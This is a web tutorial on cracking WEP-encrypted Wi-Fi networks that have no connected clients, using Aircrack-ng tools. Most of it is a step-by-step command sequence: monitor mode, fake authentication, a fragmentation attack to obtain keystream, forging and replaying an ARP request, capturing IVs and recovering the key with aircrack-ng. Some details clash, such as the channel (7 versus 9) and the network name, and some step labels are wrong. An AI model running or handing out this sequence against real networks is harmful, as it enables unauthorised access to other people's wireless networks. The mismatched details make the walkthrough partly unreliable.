WEP – How to crack WEP without clients

WEP

How to crack WEP without clients

 

Before starting explaining how to crack WEP without clients, I assume you have a network card from this list, and the injections drivers installed (Kali is fully patched) if you have doubts check our tutorial – How to install Packet Injection Drivers on Linux!

After the drivers installed we must test if everything is ok and if we are close enough to the Access Point (AP) to transmit packets to it! Follow these tutorial – How to test packets injection!

Read: What to do before attacking a Wifi Network

Scenario

Create an image with Cisco packet tracer

Hardware

 

  • 1 Access Point
  • 1 Laptop
  • 1 Alfa Card
  • 2 Neurons

Software

All tools in this tutorial come from Aircrack-ng framework;

  • Airmon-ng
  • Airodump-ng
  • packetforge-ng
  • Aircrack-ng

Network Details

ESSID: WifiSec

BSSID:

Channel: 7

Monitor Interface: mon0

MAC Wifi card:

How it works?

Cracking WEP is easy but we have to keep in mind what are our real world requirements and limitations we have to deal with. In this tutorial I will try to explain how to crack WEP without clients using fragmentation, fake authentication and ARP request replay attacks, for the curious i recommend read this two tutorials before – Conditions to crack a Wifi password, How WEP Works and WEP Attacks.

Let’s start with the theory, first we must put our network card into monitor mode to sniff the packets from the air, then we must fake the authentication with AP to trying obtain the PRGA key when applying the fragmentation attack. With the PRGA key in hands we must create a ARP packet and inject it, then we start collecting our unique IV’s once all packets are collected we need to crack them to extract the password.

Limitations

  • Proximity with AP
  • AP Filter clients MAC addresses
  • AP aren’t generating data packet’s
  • If Fails use Chopchop Attack
  • or Interactive frame selection

 

Let’s Work

 Put the interface into monitor mode;

airmon-ng start wlan0 7

1 – Fake authentication attack

aireplay-ng -1 0 -e Wifisec.info -a 9C:97:26:D7:94:71 -h 00:C0:4C:6B:FF:76 mon0

Keep alive the connection to AP

aireplay-ng -1 6000 -o 1 -q 10 -e Wifisec -a 9C:97:26:D7:94:71 -h 00:C0:4C:6B:FF:76 mon0

Create the Packet with the PRGA key

aireplay-ng -5 -b 9C:97:26:D7:94:71 -h 00:C0:4C:6B:FF:76 mon0

Inject the packet with PGRA key

packetforge-ng -0 -a 9C:97:26:D7:94:71 -h 00:C0:4C:6B:FF:76 -k 255.255.255.255 -l 255.255.255.255 -y *.xor -w arp-request

 

Start capture the data and send to a file

airodump-ng -c 9 –bssid 9C:97:26:D7:94:71 -w capturedata mon0

aireplay-ng -2 -r arp-request mon0

aircrack-ng -b 9C:97:26:D7:94:71  capture*.cap

Add a Comment